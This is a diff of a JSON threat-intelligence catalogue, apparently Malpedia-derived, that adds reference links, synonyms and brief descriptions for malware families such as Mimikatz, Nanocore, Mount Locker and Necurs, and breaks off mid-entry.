"https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://github.com/dlegezo/common", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", - "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/", + "https://securelist.com/microcin-is-here/97353/" ], "synonyms": [], "type": [] @@ -11582,7 +21473,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", - "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md" ], "synonyms": [], "type": [] @@ -11594,7 +21486,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi", + "https://www.anomali.com/blog/targeted-ransomware-activity" ], "synonyms": [], "type": [] @@ -11615,16 +21508,76 @@ "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", "value": "MILKMAID" }, + { + "description": "In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum", + "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d1942959-9c6f-462b-87bf-da6ed914669d", + "value": "Milum" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", - "https://github.com/gentilkiwi/mimikatz", + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", - "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.ic3.gov/media/news/2020/200917-1.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", + "https://www.slideshare.net/yurikamuraki5/active-directory-240348605", + "https://github.com/gentilkiwi/mimikatz", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two", + "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf", + "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/", - " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://www.hvs-consulting.de/lazarus-report/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/", + "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [], "type": [] @@ -11632,6 +21585,25 @@ "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", "value": "MimiKatz" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge", + "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures", + "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", + "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism", + "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/" + ], + "synonyms": [ + "GazGolder" + ], + "type": [] + }, + "uuid": "663d4310-51ea-4ac1-9426-b9e9c5210471", + "value": "MINEBRIDGE" + }, { "description": "", "meta": { @@ -11645,12 +21617,33 @@ "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", "value": "MiniASP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3d164ab8-58a5-433c-bbc9-b81a869ac8c8", + "value": "MiniDuke" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [], "type": [] @@ -11678,6 +21671,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://twitter.com/PhysicalDrive0/status/830070569202749440" ], "synonyms": [], @@ -11714,6 +21708,35 @@ "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", "value": "Misfox" }, + { + "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", + "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces" + ], + "synonyms": [ + "URSA" + ], + "type": [] + }, + "uuid": "ffc9ffcc-24f4-4e60-ab02-a75b007359fa", + "value": "Mispadu" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistyveal", + "https://www.epicturla.com/previous-works/hitb2020-voltron-sta" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d594d6c1-6d10-4fe8-acda-397df91c73ba", + "value": "MISTYVEAL" + }, { "description": "", "meta": { @@ -11730,8 +21753,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core" ], "synonyms": [], "type": [] @@ -11764,6 +21786,19 @@ "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", "value": "Mocton" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", + "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4b3d07a-b3ce-4128-9c5c-caa218518a00", + "value": "ModPipe" + }, { "description": "", "meta": { @@ -11801,6 +21836,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", + "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], @@ -11823,13 +21859,27 @@ "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", "value": "Mole" }, + { + "description": "MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" + ], + "synonyms": [], + "type": [] + }, + "uuid": "76842aa1-f06d-49cf-90df-158346525f91", + "value": "MoleNet" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] @@ -11842,6 +21892,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" ], "synonyms": [ @@ -11852,6 +21903,21 @@ "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", "value": "Monero Miner" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree", + "https://securelist.com/montysthree-industrial-espionage/98972/" + ], + "synonyms": [ + "MT3" + ], + "type": [] + }, + "uuid": "8a6013a1-5e5c-41f5-bd8e-c86ea7f108d9", + "value": "MontysThree" + }, { "description": "", "meta": { @@ -11865,6 +21931,21 @@ "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", "value": "MoonWind" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://twitter.com/Timele9527/status/1272776776335233024", + "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3de9ccf5-4756-4c5b-9086-6664f5a9b761", + "value": "MoriAgent" + }, { "description": "", "meta": { @@ -11897,9 +21978,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", - "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://www.recordedfuture.com/turla-apt-infrastructure/", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" ], "synonyms": [], "type": [] @@ -11907,6 +21991,24 @@ "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", "value": "Mosquito" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", + "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", + "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/", + "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/", + "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5814e05-532a-4262-a8da-82fd0d7605ee", + "value": "Mount Locker" + }, { "description": "", "meta": { @@ -11948,6 +22050,32 @@ "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", "value": "MPKBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec", + "https://dissectingmalwa.re/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1e301d67-cd12-4f46-bcb3-c60f9b78c4d0", + "value": "MrDec Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mr_peter", + "https://github.com/mrfr05t/Mr.Peter" + ], + "synonyms": [], + "type": [] + }, + "uuid": "677123aa-3a1a-4443-a968-4f6f4bc6b3c2", + "value": "MrPeter" + }, { "description": "", "meta": { @@ -11967,7 +22095,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [], "type": [] @@ -11979,7 +22108,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [], "type": [] @@ -12000,12 +22130,50 @@ "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", "value": "Mutabaha" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77d74e8c-664a-42b7-a55d-735ea138a898", + "value": "MyDogs" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom", + "https://www.malware-traffic-analysis.net/2018/12/19/index.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503", + "https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069", + "http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf" + ], + "synonyms": [ + "Mimail", + "Novarg" + ], + "type": [] + }, + "uuid": "ac3483f9-522e-4fbc-b072-e5f76972e7b3", + "value": "MyDoom" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [], @@ -12019,14 +22187,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", + "https://blog.centurylink.com/mylobot-continues-global-infections/", + "https://github.com/360netlab/DGA/issues/36", + "http://www.freebuf.com/column/153424.html", + "https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html", + "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" ], - "synonyms": [], + "synonyms": [ + "FakeDGA", + "WillExec" + ], "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", "value": "MyloBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mzrevenge", + "https://dissectingmalwa.re/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html" + ], + "synonyms": [ + "MaMo434376" + ], + "type": [] + }, + "uuid": "5cb1091c-bfe7-440c-a8c7-b652e205e65b", + "value": "MZRevenge" + }, { "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.", "meta": { @@ -12055,6 +22246,27 @@ "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", "value": "Nabucur" }, + { + "description": "According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim's system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", + "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html" + ], + "synonyms": [ + "Cyruslish", + "TWOPENCE", + "VIVACIOUSGIFT" + ], + "type": [] + }, + "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", + "value": "NACHOCHEESE" + }, { "description": "", "meta": { @@ -12073,6 +22285,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -12083,16 +22296,44 @@ "value": "Naikon" }, { - "description": "", + "description": "Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/", + "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/", + "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.ic3.gov/media/news/2020/200917-1.pdf", + "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://goggleheadedhacker.com/blog/post/11", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" + "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://malwareindepth.com/defeating-nanocore-and-cypherit/", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a" + ], + "synonyms": [ + "Nancrat", + "NanoCore" ], - "synonyms": [], "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", @@ -12129,6 +22370,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], @@ -12142,6 +22385,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], "synonyms": [], @@ -12150,6 +22395,23 @@ "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", "value": "NavRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan", + "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://vblocalhost.com/uploads/VB2020-20.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "85056c54-f8f1-4a98-93cb-322cc1deb52c", + "value": "nccTrojan" + }, { "description": "", "meta": { @@ -12158,10 +22420,17 @@ "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-riverview", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" ], @@ -12173,12 +22442,58 @@ "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", "value": "Necurs" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", + 